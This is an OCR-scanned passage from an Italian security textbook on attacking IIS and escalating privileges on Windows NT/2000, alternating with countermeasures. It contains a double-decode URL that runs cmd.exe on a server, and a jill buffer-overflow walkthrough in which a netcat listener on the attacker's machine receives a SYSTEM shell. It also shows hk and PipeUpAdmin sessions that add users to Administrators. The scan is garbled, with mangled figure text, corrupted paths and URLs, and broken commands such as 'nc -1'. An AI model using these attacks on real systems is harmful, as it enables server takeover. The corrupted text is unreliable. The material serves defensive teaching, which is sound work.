che attraversano directory di eseguibili. Questa condizione può essere sfruttata in 
modo molto simile al baco di Unicode, come mostrato nell’URL seguente: 


http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 


Si tratta chiaramente di un comportamento indesiderabile; ma la pericolosità degli 

exploit Unicode e Double Decode è mitigata da una serie di fattori: 

e la prima directory virtuale contenuta nella richiesta (nel nostro esempio, 
/scripts) deve avere le autorizzazioni Execute per l’utente che presenta la 
richiesta. Di solito questo non è un deterrente, poiché comunemente l'IIS è 
configurato con diverse directory che conferiscono un Execute a IUSR di 
default (per esempio le directory scripts, iissamples, iissadmin, iishelp, cgi- 
bin, msadc, _vti_bin, certsrv, certcontrol e certenroll); 

e se la directory virtuale iniziale non si trova sul volume del sistema, è impos- 
sibile saltare a un altro volume, poiché attualmente non esiste una sintassi 
nota che consenta di effettuare tale acrobazia. Se cmd. exe è mantenuto nel- 
la sua posizione di default nel volume di sistema, esso non può essere ese- 
guito da attacchi Unicode o Double Decode avviati su altri dischi non di si- 
stema. Ovviamente, questo non significa che non esistano altri eseguibili 
potenti sul volume in cui il sito Web affonda le sue radici e questi attacchi 
basati sull’attraversamento delle directory sono in grado di fare agevolmen- 
te un giro esplorativo; 

e icomandi innescati tramite Unicode o Double Decode vengono eseguiti nel 
contesto dell’utente remoto che effettua la richiesta HTTP. Di solito, si tratta 
dell'account IUSR_machinename utilizzato per simulare richieste Web ano- 
nime, che è un membro del gruppo incorporato Guests e di default dispone 
di privilegi molto limitati sui sistemi della famiglia NT. 

Sebbene la portata della compromissione sia inizialmente limitata da questi 

fattori, se l'aggressore è in grado di identificare una directory su cui l'account 

IUSR_machinename (0 IWAM_machinename) ha il permesso di scrivere, general- 

mente scaricherà ulteriori tool e metterà radici nel server Web. Esistono diversi 

script di dominio pubblico che consentono di scaricare file su un server vulnera- 
bile ad attacchi Unicode o Double Decode; tra questi il nostro preferito è unico - 
deloader.pl di Roelof Temmingh. 

Il tool più valido per effettuare l'upload su un server con NT4 o una versione pre- 

cedente è hk.exe (si veda il paragrafo “Contraffazione delle richieste LPC Ports” 

più avanti in questo capitolo). Questo attacco consente agli aggressori di aggiun- 
gere l'account IUSR o IWAM a un gruppo amministrativo, ponendo le basi per la 

completa compromissione del sistema. La scalata ai privilegi su Windows 2000 è 

più difficile, ma può essere effettuata con un diverso insieme di tool. Per effettua- 

re la scalata dei privilegi mediante Unicode su IIS 5, occorre procurarsi il tool 
ispc di Isno (http://www.xfocus.org), che consente di automatizzare l’attacco 
basato sulla “vulnerabilità dell'innalzamento dei privilegi nei listati del file system” 

di IIS 5, assicurando il controllo client/server remoto di una macchina con IIS vul- 

nerabile (http://www.microsoft.com/technet/bulletin/MS01-044.asp). 
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C) Buffer overflow 


Diffusione: 10 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 10 


Sin dalla scoperta da parte dei ricercatori di eEye Digital Security, risalente al giugno 
1999, di un buffer overflow nella ISM.DLL, sono stati periodicamente diramati avvisi 
in cui si segnalavano altri spettacolari buffer overflow IIS. Nel maggio 2001, i ricer- 
catori annunciarono la scoperta di un altro buffer overflow contenuto nell’estensio- 
ne ISAPI che gestisce i file . printer (C:\WZNN7\Sistemi32\msw3prt.dl} che con- 
sente di assicurare a Windows 2000 il supporto dell’IPP (Internet Printing Protocol). 
L’IPP consente il controllo basato sul Web di vari aspetti delle stampanti di rete. 
eEye ha rilasciato un prototipo di attacco che consente di scrivere un file su 
Ci\www.eEve.com.txt, ma, scrivendo un opportuno codice di shell, è possibile com- 
piere quasi qualsiasi azione, poiché il codice viene eseguito nel contesto del pro- 
cesso IIS, il che equivale a dire SYSTEM. È abbastanza certo che, sull'onda del co- 
municato sul buffer overflow IPP, un attacco chiamato jill sia stato inviato da dark 
spyrit (anima nera) di beavuh.org a molte popolari mailing list dedicate alla sicurez- 
za. Sebbene jill sia stato scritto in UNIX C, la sua compilazione su Windows 2000 è 
un gioco da ragazzi con l’ambiente Cygwin (http://www .cygwin.com). 

Ecco come funziona questo attacco. Per prima cosa, mettetevi in ascolto sul sistema 
dell’aggressore utilizzando netcat: 


C:\>nc -vv -1 -p 2002 
listening on [any] 2002 ... 


Sferrate quindi l'attacco jill contro il dispositivo di ascolto dell’aggressore: 


C:\>jill 192.168.234,222 80 192.168.234.250 2002 
iis5 remote .printer overflow. 
dark spyrit <dspyrit@beavuh.org> / beavuh labs. 


connecting... 
sent... 


you may need to send a carriage on your listener if the shell doesn't 
appear. 
have fun! 


Se tutto va per il verso giusto, subito dopo l'esecuzione dell'attacco, una shell remo- 
ta viene caricata nel dispositivo di ascolto dell’aggressore. Può darsi che dobbiate 
digitare un carriage return per visualizzare la shell quando vi accorgete che la con- 
nessione è stata ricevuta e anche dopo ciascun comando successivo, come mostrato 
nell'esempio seguente (anche in questo caso, questo avviene sul sistema dell'ag- 


gressore): 


C:\>nc -vv -1 -p 2002 

listening on [any] 2002 ... 

connect to [192.168.234.250] from MANDALAY [192.168.234.222] 1117 
[carriage return] 


166 Capitolo 5 


Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-1999 Microsoft Corp. 


C: \WINNT\system32> 
C:\WINNT\system32>whoami 
whoami 

[carriage return] 

NT AUTHORITY\SYSTEM 


Abbiamo utilizzato l’utility whoami del Resource Kit per mostrare che questa shell è in 
esecuzione nel contesto dell’onnipotente account LocalSystem dalla macchina remota. 
Poiché l'attacco iniziale si verifica tramite il canale delle applicazioni Web (general- 
mente sulla porta 80) e poiché la shell viene sparata dal server Web del sistema vio- 
lato su una porta definita dall’aggressore, questo attacco può essere difficilmente 
contrastato mediante il filtraggio a livello router o firewall. 

Subito dopo la versione per UNIX/Linux, venne rilasciata una versione Win32 nativa di 
jill, chiamata jill-win32. Un hacker chiamato CyrusTheGreat rilasciò la propria versione 
di questo attacco, chiamata iis5hack e basata sul codice della shell di jill. Tutti questi 
tool funzionano esattamente nello stesso modo illustrato in precedenza, anche per 
quanto riguarda la necessità di prestare attenzione alla chiusura della shell iniettata. 


Ricordatevi di uscire da questa shell remota in modo ortodosso (digitando 
exit), altrimenti il sito Web di default del sistema violato si bloccherà e non 
sarà più in grado di evadere le richieste! 


Contromisure agli attacchi a IIS 


Vi perdoniamo se a questo punto siete un po’ sopraffatti da tutte queste informazio- 
ni. Potete tranquillizzarvi, poiché il problema della sicurezza dell’IIS è facilmente ri- 
solvibile: è sufficiente seguire alcune semplici regole. 


Filtrazione della rete in entrata e in uscita 


Ovviamente, occorre utilizzare firewall o router per limitare l’accesso del mondo 
esterno ai server Web, ma è anche necessario considerare il filtraggio delle comuni- 
cazioni in uscita dal server Web. In molti casi, i server Web non devono mai avviare 
connessioni con parti esterne. In effetti, come avete visto negli esempi precedenti, 
la tecnica di Web hacking utilizzata con maggiore frequenza consiste nell’avviare 
una connessione di tipo “telefonata a casa” con la macchina dell’hacker. Dovete ap- 
plicare restrizioni all'uscita su Internet da server Web a “TCP established” solo per 
impedire questi tipi di trucchi (ovviamente, i server Web dovranno avviare connes- 
sioni con database back-end, ma stiamo assumendo che tali connessioni back-end 
siano parzialmente fidate e che pertanto non richiedano il filtro in uscita). 

Con l'evoluzione continua di Internet, l’implementazione del filtro in uscita unicamente 
verso connessioni stabilite sta diventando sempre più difficile. Per esempio, spesso i 
servizi Web devono avviare comunicazioni con l'esterno tramite Internet. Se i servizi 
Web sono in esecuzione, consigliamo di isolare le reti con server che richiedono comu- 
nicazioni più complesse dai server Web standard, “quelli che devono solo rispondere”. 


Aggiornatevi sulle nuove patch 


Occorre dire che non ci sono scuse per chi ha un server IIS affacciato su Internet 
privo delle ultime patch. Se scegliete di non ascoltare questo avvertimento, diverti- 
tevi pure a estrarre ripetutamente gli ultimissimi worm IIS dai vostri server... 
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Consigliamo di mantenervi aggiornati anche se avete disattivato funzionalità interes- 
sate da una determinata patch specifica. Microsoft realizza spesso modifiche note- 
voli con il rilascio di nuovi service pack e se vi siete lasciati sfuggire una patch inter- 
media potreste trovarvi spiazzati all'uscita dell'SP successivo; inoltre non saprete 
mai in che modo interagiscono i vari componenti del software: il solo fatto che una 
funzionalità sia disattivata non implica che un intruso non riesca a sfruttarla se essa 
è comunque presente sul vostro disco. In qualsiasi organizzazione seria che abbia- 
mo consultato, l’unica discussione reale sull’applicazione delle patch riguardava la 
tempistica, non il tipo di patch. 

Probabilmente vorrete prendere un po’ di tempo prima di applicarle, per il semplice 
fatto che l’attuale serie di tool Microsoft per l'installazione delle patch è frammentario 
e fonte di confusione. Nel paragrafo “Installazione di patch aggiornate” nel prosieguo 
di questo capitolo vedrete quali sono le opzioni disponibili in quest'area. 


Disattivazione dell’estensione ISAPI e dei filtri inutilizzati 


Le estensioni ISAPI sono le DLL che gestiscono le richieste per alcuni tipi di file (per 
esempio, i file .printer o .idg). Basandoci sulla storia delle vulnerabilità dell'IIS 
associate a estensioni ISAPI problematiche, possiamo affermare che questa è l’ope- 
razione più importante che potete compiere per rendere maggiormente sicure le 
vostre installazioni dell’IIS. 

Potete controllare quali estensioni sono caricate quando l’IIS viene avviato, median- 
te il tool IIS Admin (%systemroot%\system32\inetsrv\iis.msc). Fate clic con il tasto 
destro del mouse sul sito Web che desiderate amministrare e selezionate Proprie- 
tà/Home Directory; nella sezione Impostazioni applicazione, selezionate il pulsante 
Configurazione, e dalla finestra di dialogo che appare la scheda Mapping: infine eli- 
minate la mappatura per .htr su ism.dll, come mostrato nella Figura 5.5. 


C\WINDOWS\System32\inetsn\asp. 

C\WINDOWS\System32\inetsrv\asp.... 
C\WINDOWS\System32\inetsiv\asp.... 
C\WINDOWS\System32\inetsrv\asp.... 
CWINDOWS\System32\inetsrv\http... 
CA\WINDOWS\System32\inetarw\ssin... 
C\WINDOWS\System32\inetsv\ssin... 


C'\WINDOWS\System32\inetsrv\ssin. 


Figura 5.5 

Per prevenire l'attacco buffer overflow di printer e molti altri exploit simili basati 
sulle estensioni ISAPI incorporate, è sufficiente rimuovere le mappatura 

delle applicazioni per l'opportuna estensione nel tool IIS. 
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Per fornire un paio di esempi pertinenti dei molti problemi che quest'unica opera- 
zione consente di evitare, tenete presente che il buffer overflow +.htr e quello IPP 
di cui abbiamo parlato in precedenza potrebbero essere completamente evitati se 
non fossero mappate, rispettivamente, le DLL ISM e msw3prt. 

Prendete inoltre in seria considerazione la possibilità di disattivare anche i filtri ISA- 
PI inutilizzati. I filtri ISAPI effettuano il parsing di ogni richiesta IIS anziché delle 
sole richieste aventi le opportune estensioni. Sebbene i filtri ISAPI abbiano creato 
molti meno problemi delle estensioni ISAPI, è meglio peccare per eccesso di sicu- 
rezza che doversene poi pentire. Per disattivare i filtri ISAPI in Windows 2000 e ver- 
sioni successive, aprite il tool IIS Admin, fate clic con il tasto destro del mouse sul 
sito che desiderate amministrare, selezionate Proprietà e, dalla finestra di dialogo 
che appare, la scheda Fitri SAP, dalla quale eliminerete qualsiasi filtro superfluo, 
come mostrato nella Figura 5.6. Dovrete valutare quali filtri vi occorrono realmente; 
tuttavia vi consigliamo di disattivare almeno il filtro delle estensioni del server di 
FrontPage (fpexedll.d1l1) se non dovete utilizzarlo. 


Ipr oprietà - Siti Web 


Figura 5.6 


Eliminazione del filtro ISAPI relativo all'estensione del server di FrontPage 
da IIS 5 e versioni successive. 


Probabilmente vi chiederete qual è la differenza tra le estensioni e i filtri 
ISAPI. Le estensioni gestiscono unicamente le richieste relative alla compa- 
razione dei tipi di file (per esempio, file .printer 0 .idq), mentre i filtri in- 
tercettano tutte le richieste IIS dirette all’interno. 


Assenza di dati riservati nel codice sorgente 


In precedenza avete visto come alcuni attacchi come quello basato su +. htr possa- 
no rivelare informazioni che causano una seria compromissione dei sistemi. Certo, i 
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problemi di questo tipo dovrebbero essere fronteggiati mediante l'applicazione di 
una patch e utilizzando le prassi ottimali di configurazione illustrate in precedenza; 
potete tuttavia essere sicuri che in futuro vi saranno nuovi attacchi in grado di elu- 
dere le più recenti e fantasiose patch e configurazioni. Pertanto, l’unico modo sicu- 
ro per impedire che tali informazioni siano divulgate risiede nell’impedire che siano 
disponibili! 

Il pericolo maggiore, da questo punto di vista, viene dalla memorizzazione delle 
credenziali di SQL Server negli script ASP, come avete visto nel nostro esempio 
dell’exploit +. htr. Ci sono diversi modi per evitare questo inconveniente; il princi- 
pale consiste nell’utilizzo di un’autenticazione SQL integrata, affinché non sia ne- 
cessario memorizzare le credenziali in uno script. 

Un'altra fonte inesauribile di informazioni divulgate in modo inopportuno è quella 
costituita dai cosiddetti file include che supportano gli script ASP. Un semplice truc- 
co aiuta a prevenire la divulgazione dei file include, che di solito hanno l'estensione 
nc: modificarne l'estensione in .asp. In questo modo essi vengono consegnati 
all'estensione ISAPI Asp.DLL anziché essere resi come testo ordinario nel browser 
del client. Non dimenticate di aggiornare tutti i riferimenti ai nuovi nomi file negli 
script ASP e nei file connessi. 


Installazione delle root virtuali su un volume separato 


Gli attacchi punto-punto-barra sono tra i primi trucchi che qualsiasi aggressore di 
media intelligenza tenterà sul vostro sito Web, per cui accertatevi che tali tentativi di 
uscire dalle directory delle root virtuali non consentano all’intruso di mettere le 
mani su tool o dati di importanza critica. Ricorderete dal nostro esempio degli attac- 
chi Unicode e Double Decode che non c'è una sintassi che consenta a tali attacchi 
di saltare ad altre unità a disco; pertanto, se installate le vroot su un drive separato, 
questi attacchi non potranno vagare nelle directory del sistema ed eseguire la shell 
dei comandi (cmd.exe). Tale misura pertanto limita notevolmente gli effetti di que- 
sta tecnica, altrimenti perniciosa. Prestate attenzione a non installare potenti tool 
amministrativi sul volume della vroot; in caso contrario, potreste trovarvi nella stes- 
sa situazione; inoltre, se state pensando di spostare le vroot esistenti su un'unità di- 
sco separata, ricordatevi di utilizzare un tool quale robocopy del Resource Kit, in 
grado di preservare le ACL NTFS: l'utilizzo del comando standard della famiglia NT 
copy per copiare da un volume all’altro modificherebbe le ACL a “Everyone: Full 
Control” di default! 


Utilizzo dell'NTFS 


Visto che abbiamo accennato all’NTFS, consentiteci di ricordare che l’intera sicurez- 
za dell’IIS dipende dalle autorizzazioni NTFS. Analizzate attentamente ogni ACL 
contenuta nelle vostre vroot, accertandovi che sia assicurato l’accesso opportuno. 
Non utilizzate partizioni FAT per i server Web. I file system FAT non offrono alcuna 
sicurezza e lasciano il vostro server completamente vulnerabile. 


C:\) su Administrators: Full Control, System: Full Control e Autbenticated 
Users: Read and Execute, List Folder Contents e Read. Inoltre, se desiderate 
consultare la lista di autorizzazioni da assegnare a potenti utility contenu- 
te nella cartella di sistema, visitate l'indirizzo http://ww.micro- 
soft.com/technet/security/prodtech/windows/windows2000/stayse- 
cure/secopsa.asp. 


4 ‘ Consigliamo di impostare le autorizzazioni Ysystemdrive% (per esempio, 
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Disattivare i servizi non necessari 


Come abbiamo annunciato diverse volte in questo libro, la via più semplice per re- 
alizzare un sistema maggiormente sicuro consiste nel disattivare le funzionalità, spe- 
cie quando esse sono disponibili da posizioni remote sulla rete. Tra i servizi impor- 
tanti da considerare quando si fortifica l’IIS sono compresi i servizi Windows stan- 
dard (SMB, Avvisi, Messenger e così via), i servizi connessi all'IIS (W3SVC, FTP, 
SMTP e NNTP), Index Server e qualsiasi altro servizio esterno quale il supporto 
RAD di FrontPage Server Extensions Visual Studio (un componente opzionale di 
Windows 2000 che viene installato di rado, citato in questo paragrafo poiché nel 
2001 è stato il bersaglio di un nefasto buffer overflow). 


Altre risorse per la sicurezza di IIS 


Microsoft ha per molto tempo gestito varie liste di controllo della sicurezza sull’IIS; 
tutte queste liste sono catalogate all'indirizzo http://ww.microsoft.com/tech- 
net/tool/tool.asp. Tra le migliori risorse elencate c'è la Secure Internet Informa- 
tion Services 5 Checklist di Michael Howard. Si tratta a nostro parere di un’autore- 
vole risorsa aggiornata sulla sicurezza dell’IIS; essa contiene molte altre contromisu- 
re degne di nota, in aggiunta a quelle più importanti riportate in questo libro. 


Utilizzo di IIS Lockdown e URLScan 


Vi incoraggiamo inoltre caldamente a installare il tool IIS Lockdown su tutti i server IIS. 
Questo tool si presenta sotto forma di wizard che guida gli amministratori passo passo 
durante la procedura di hardening dell’IIS su un sistema. Una delle sue funzionalità 
principali, chiamata URLScan, è costituita da un filtro ISAPI installabile che effettua la 
scansione di tutte le richieste IIS in arrivo e respinge l’attacco da parte di un malinten- 
zionato basandosi su un file di configurazione definito dall'’amministratore. Configura- 
to correttamente, URLScan può arrestare tutti gli attacchi IIS elencati in questo libro. 


Attivazione della registrazione 


In qualsiasi momento del suo ciclo di lavoro, un server Web può essere compro- 
messo. Quando questo succede, è fondamentale disporre di informazioni sull’inevi- 
tabile attacco. Accertatevi che l'IIS sia configurato in modo da registrare le richieste 
nel formato di logging W3C Extended e che vengano registrate le voci seguenti: in- 
dirizzo IP del client, nome utente, metodo, URI Stem, stato dell’HTTP, stato di 
Win32 e User Agent (eventualmente, conviene catturare anche l'indirizzo IP e la 
porta del server se avete diversi server IIS su un unico computer). 


Non dimenticate i log degli eventi, che spesso registrano eventi che non 
appaiono nei log HS, quali improvvise interruzioni del servizio (per esem- 
pio, dovute a un attacco di tipo buffer overflow). Vi consigliamo EventCom- 
bNT, un utile tool gratuito per effettuare il parsing dei log degli eventi, scari- 
cabile all'indirizzo http://www.microsoft.com/technet/security/pro- 
dtech/windows/windows2000/staysecure/default.asp. 


Potenziamento della sicurezza delle applicazioni Web 


Ultimo ma non meno importante, occorre rilevare che tutte le contromisure citate in 
questo paragrafo riguardano unicamente l’IIS e incidono in modo limitato sulla logi- 
ca dell'applicazione in esecuzione sul server. 
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Attacchi con autenticazione 


Fino a qusto punto abbiamo illustrato i tool e le tecniche maggiormente utilizzate 
per ottenere un qualche livello di accesso a un sistema della famiglia NT. Tipica- 
mente, questi meccanismi assicurano sul sistema obiettivo vari gradi di privilegio, 
da Guest a SYSTEM. Tuttavia, indipendentemente dal livello dei privilegi raggiunto, 
la prima conquista ottenuta nell'ambiente di un qualsiasi sistema della famiglia NT è 
in genere solo l’inizio di una campagna militare destinata a durare molto più a lun- 
go. In questo paragrafo spiegheremo come sono condotte le operazioni militari suc- 
cessive alla caduta del primo sistema e alla prima sconfitta. 


Ricerca di privilegi 


Una volta che un hacker è riuscito a ottenere un account utente su un sistema della 
famiglia Windows NT, cercherà immediatamente di ottenere il privilegio più 
importante: l'account Administrator. Uno dei più fantastici hack di tutti i tempi sull’am- 
biente NT è quello costituito dalla cosiddetta famiglia di attacchi di tipo getadmin 
(http://ww.windowsitsecurity.com/Articles/Index.cfm?ArticleID=9231). L'exploit 
getadmin è stato il primo serio attacco con scalata ai privilegi sferrato contro NT4 e 
sebbene tale attacco specifico sia stato tamponato con una patch (con l’uscita del Servi- 
ce Pack 3 di NT4), la tecnica di base con cui esso funziona, l'iniezione DLL, sopravvive 
e viene ancora utilizzata efficacemente contro Windows 2000 e versioni successive in 
altri tool di cui parleremo in questo capitolo. 

Le possibilità del programma getadmin sono limitate dal fatto che quest'applicazio- 
ne deve essere avviata localmente sul sistema preso di mira. Poiché il comporta- 
mento predefinito dei gruppi ipotizza che la maggior parte degli utenti non sia in 
grado di effettuare l'autenticazione locale a un server NT, questo programma po- 
trebbe essere utile solamente a qualche “infiltrato”, che sia già membro di uno dei 
gruppi di operatori che hanno accesso alla console (Account, Backup, Server ecc.) 
oppure all'utente predefinito dell'Internet Information Server, IUSR_nome_ macchi- 
na, che può anch'esso accedere localmente. Se alcuni malintenzionati hanno già 
questo livello di privilegio sul vostro server, getadmin non peggiorerebbe certo le 
cose, in quanto gli utenti di tipo operatore hanno già accesso a gran parte delle in- 
formazioni del sistema. 

Sfortunatamente, Windows 2000 non si è rivelato più coriaceo delle versioni prece- 
denti per quanto riguarda la resistenza agli attacchi basati sulla scalata ai privilegi. 
Sebbene alcuni punti vulnerabili precedenti quali getadmin e gli attacchi connessi 
siano stati tamponati con opportune patch, una volta ottenuto il privilegio di acces- 
so interattivo, risulta molto difficile sui sistemi Microsoft impedire la scalata ai privi- 
legi. L'accesso interattivo è inoltre diventato sempre di più diffuso, vista l’afferma- 
zione di Terminal Server di Windows 2000 come strumento per la gestione remota e 
la potenza di elaborazione distribuita. 

Alcuni importanti attacchi di scalata ai privilegi della famiglia NT continuano a esse- 
re scoperti a un ritmo di due o tre all'anno. In questo paragrafo, abbiamo scelto al- 
cuni dei punti deboli di più alto profilo e magiormente sfruttati. 
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I) Contraffazione delle richieste LPC Ports 


Diffusione: 1 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 7 


Questa vulnerabilità di NT 4 è stata identificata dal gruppo RAZOR (http://razor. 
bindview.com) in una funzione dell’API LPC (Local Procedure Call) Ports, che consente 
la comunicazione tra thread e processi sullo stesso computer. Di norma, LPC Ports mette 
a disposizione un'interfaccia che consente a un thread server di fingersi un thread client 
che richiede servizi. LPC Ports esegue anche controlli di validità sulle richieste client per 
accertare la loro legittimità, ma un hacker che sia in grado di creare un thread server e un 
thread client potrebbe manomettere le procedure di invalidamento per “mascherare” il 
thread client come un utente qualsiasi, perfino SYSTEM, Il codice che dimostra questa 
vulnerabilità (chiamato hk) è disponibile all'indirizzo http://ww.nmrc.org ed è utiliz 
zato di seguito per illustrare la scalata dell’utente Mallory, un membro del gruppo 
Backup Operators dotato di autorizzazione di accesso, al gruppo Administrators. 

Per prima cosa, mostriamo che Mallory è effettivamente un membro del gruppo 
Backup Operators e non di Administrators, utilizzando l’utility NTRK whoami: 


C:\>whoami 
[Group 1] = "IIS47\None" 
[Group 2] = "Everyone" 
{Group 3] = "BUILTIN\Users" 
= "BUILTIN\Backup Operators" 


[Group 4] 


Il codice seguente mostra che Mallory non può essere aggiunto ad Administrators: 


C:\>net localgroup administrators mallory /add 
System error 5 has occurred. 


Access is denied. 

Quindi eseguiamo lo stesso comando net use insieme allo strumento hk: 
C:\>hk net localgroup administrators mallory /add 

lsass pid & tid are: 47 - 48 

NtImpersonateClientOfPort succeeded 


Launching line was: net localgroup administrators mallory /add 
Who do you want to be today? 


Mallory è ora un membro del gruppo Administrators, come mostrato di seguito: 


C:\>net localgroup administrators 


Alias name administrators 

Comment Members can fully administer the computer/domain 
Members 

Administrator mallory 


The command completed successfully. 
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© Contromisure a Hk 


Microsoft ha pubblicato un aggiornamento successivo al Service Pack 6a che modi- 
fica alla radice la funzione di validazione della chiamata all'API LPC Ports. Questo 
hotfix è disponibile nel Microsoft Security Bulletin MS00-003 all'indirizzo http: // 
www.microsoft.com/technet/security/bulletin/ms00-003.asp. 

Sottolineiamo ancora una volta che si tratta di una patch pubblicata dopo il Service 
Pack 6a. Quando si tratta di installare le patch di sicurezza, molte organizzazioni pre- 
feriscono aspettare il service pack successivo. Questo è assurdo, perché significa che 
la maggior parte delle loro macchine rimarrà probabilmente vulnerabile a questo at- 
tacco fino al rilascio del Service Pack 7. Queste organizzazioni resteranno vulnerabili 
fino a quando non sarà eseguito l'aggiornamento a Windows 2000. Vi consigliamo 
quindi di mantenere sempre il vostro sistema aggiornato con gli aggiornamenti pub- 
blicati dopo l’uscita dei Service Pack. 

La migliore contromisura per molti attacchi basati sulla scalata ai privilegi consiste 
nel limitare i logon interattivi. Questa contromisura di norma respingerà gli attacchi 
di tipo hk; purtroppo però hk funziona bene anche in modalità remota oltre che in 
quella interattiva. Ricorderete che abbiamo accennato al suo utilizzo in abbinamen- 
to con gli attacchi di attraversamento delle directory IIS nella parte precedente di 
questo capitolo, quando abbiamo spiegato che era possibile attivare hk tramite una 
sessione netcat remota per procedere alla scalata ai privilegi. Procuratevi la patch! 


O) Previsione delle named pipe 
che eseguono un codice come SYSTEM 


Diffusione: +4 
Semplicità: 7 
Impatto: 10 
Fattore di rischio: 7 


Scoperto da Mike Schiffman e segnalato su Bugtraqg (ID 1535), questo metodo di 
scalata dei privilegi locali sfrutta la possibilità di prevedere la creazione delle named 
pipe quando Windows 2000 avvia servizi di sistema (come Server, Workstation, Av- 
visi e ClipBook, che si connettono all’interno dell'account SYSTEM). Prima dell’av- 
vio di ogni servizio, viene creata sul lato server una named pipe con un nome di se- 
quenza prevedibile, che può essere ottenuta dalla chiave HKLM\System\Current - 
ControlSet\Control\ServiceCurrent del Registro di sistema. 

Qualunque utente Windows 2000 che abbia effettuato un accesso interattivo (com- 
presi quindi gli utenti remoti di Terminal Server) può pertanto prevedere il nome di 
una delle named pipe successive, istanziarla e assumere il contesto di sicurezza di 
SYSTEM quando viene nuovamente avviata. Se alla named pipe viene aggiunto il 
codice arbitrario, esso verrà eseguito con privilegi SYSTEM, consentendo di effet- 
tuare praticamente qualsiasi operazione sul sistema locale, come per esempio ag- 
giungere l’utente corrente al gruppo Administrators. 

Sfruttare la vulnerabilità della prevedibilità delle named pipe è un gioco da ragazzi 
ricorrendo allo strumento PipeUpAdmin di Maceo, che aggiunge l'account 
dell'utente corrente al gruppo Administrators locale, come mostra l'esempio se- 
guente. Questo esempio parte dal presupposto che l'utente jsmith sia autenticato 
con accesso interattivo a una console di comando e che sia membro del gruppo 
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Server Operators. Per prima cosa jsmith controlla l'appartenenza del gruppo locale 
Administrators: 


C:\>net localgroup administrators 

Alias name administrators 

Comment Administrators have complete and unrestricted 
access to the computer/domain 


Members 


Administrator 
The command completed successfully. 


In seguito cerca di aggiungersi ad Administrators, ma riceve un messaggio di acces- 
so negato perché non ha i necessari privilegi: 


C:\>net localgroup administrators jsmith /add 
System error 5 has occurred. 


Access is denied. 


Il nostro jsmith non è tuttavia ancora stato sconfitto. Scarica pipeUpAdmin da Inter- 
net (http://ww.dogmile.com/files) e quindi lo esegue. 


C:\>pipeupadmin 
PipeUpAdmin 
Maceo <maceo @ dogmile.com> 

(C) Copyright 2000-2001 dogmile.com 
The ClipBook service is not started. 
More help is available by typing NET HELPMSG 3521. 
Impersonating: SYSTEM 
The account: FS-EVIL\jsmith 
has been added to the Administrators group. 


In seguito jsmith esegue il comando net localgroup e si trova esattamente nel 
punto in cui desiderava trovarsi: 


C:\>net localgroup administrators 

Alias name administrators 

Comment Administrators have complete and unrestricted 
access to the computer/domain 


Members 


Administrator 
jsmith 
The command completed successfully. 


Ora per abusare dei privilegi dell'equivalente di Administrator jsmith deve semplice- 
mente scollegarsi e quindi ricollegarsi. Molte scalate dei privilegi seguono questa pro- 
cedura, poiché Windows 2000 deve ricreare il token di accesso dell’utente corrente per 
aggiungere il SID della nuova appartenenza al gruppo: i token possono essere rinno- 
vati utilizzando una chiamata API, oppure semplicemente scollegandosi e, quindi, au- 
tenticandosi nuovamente (per una descrizione dei token, si veda il Capitolo 2). 
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Osservate inoltre che lo strumento PipeUpAdmin deve essere eseguito con il conte- 
sto utente INTERACTIVE (ossia, è necessario essere collegati alla tastiera fisica o tra- 
mite una shell remota con lo stato INTERACTIVE, per esempio tramite i Servizi ter- 
mina); per questo motivo PipeUpAdmin non può essere eseguito tramite shell re- 
mote generate senza il SID INTERACTIVE nel token. 


Patch contro la prevedibilità 
delle named pipe dei servizi 


Microsoft ha rilasciato una patch che modifica le modalità con le quali lo snap in 
Gestione controllo servizi crea e posiziona le named pipe, disponibile all'indirizzo 
http://www.microsoft.com/technet/security/bulletin/MS00-053.asp. Que- 
sta patch non è inclusa nel Service Pack 1 di Windows 2000 ed è applicabile indi- 
pendentemente dalla presenza sugli host di SP1. 

Ovviamente, i privilegi di accesso interattivo devono essere rigidamente limitati per 
qualunque sistema sul quale siano conservati dati riservati, poiché exploit come 
questi diventano molto più facili una volta conquistata questa importante base di 
appoggio. Per verificare i diritti di accesso interattivo in Windows 2000, eseguite 
l’applet Criteri di protezione locali, individuate il nodo Criteri locali\Assegnazione 
diritti utente e controllate a chi è assegnato il diritto Accesso locale. 

Una novità in Windows 2000 risiede nella possibilità di applicare a molti di questi 
privilegi opzioni che permettono di escludere dai diritti gruppi o utenti specifici, 
come il diritto Nega accesso locale, mostrato nella figura seguente. 


Impostazioni protezione 
“LB Criteri account fi}Esecuzione operazioni di manutenzione... 
L@ Criteri locali (tr) cenerazione di controlli di protezione 


Criteri controllo a > x 
Sr liutla ° Gestione file registro di controllo e di pr... 
CS Assegnazione d g]Ignorare controllo incrociato 


ad gent di pico ti EX] Impostazione account computer ed ute... 
fg] Modifica dei valori di ambiente firmware 


#-@ Criteri chiave pubblica 

E-(] Criteri restrizione software = I 

-® Criteri di protezione IP su computer locale [Rx ]Modfica dell'orario di sistema 
Bif]Nega accesso al computer dalla rete 
(Nega accesso come processo batch 


Nega accesso come servizio 


Ri]Nega accesso tramite Servizi terminal 
]Regolazione limite risorse memoria per... i 
i »f 


in Windows 2000 Professional e nella configurazione server autonomo di 
Windows 2000 Server. I controllori di dominio sono più restrittivi a causa 
del criterio Default Domain Controllers fornito con il prodotto (anche se tut- 
ti i gruppi Operator dispongono di questo diritto). Consigliamo vivamente 
di rimuovere in qualunque caso Users e Guest e di considerare con molta 
attenzione quali altri gruppi sarebbe meglio escludere da questo privilegio. 


j Di default, il gruppo Users e l'account Guest hanno i diritti Accesso locale 
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Pilfering 


Una volta ottenuto uno status equivalente a quello dell'account Administrator, gli 
hacker rivolgono tipicamente la loro attenzione alla possibilità di raccogliere più in- 
formazioni possibili da sfruttare per ulteriori azioni di conquista del sistema. Questo 
processo è chiamato piffering. 

Potreste chiedervi che senso può avere continuare a leggere questo capitolo se un 
hacker si è impadronito dell’utente Administrator del vostro sistema. In questi casi, 
a meno che non abbiate l’intenzione di ripulire completamente il server e installare 
tutto dall'inizio, sarà molto utile cercare di identificare quali risorse sono state effet- 
tivamente compromesse. Oppure, aspetto ancora più importante, l’intruso potrebbe 
essersi introdotto solamente in un segmento di minore importanza della rete; quindi 
potrebbe voler installare strumenti aggiuntivi per estendere la propria influenza. È 
molto importante e possibile riuscire a fermare i pirati che si sono intromessi nel si- 
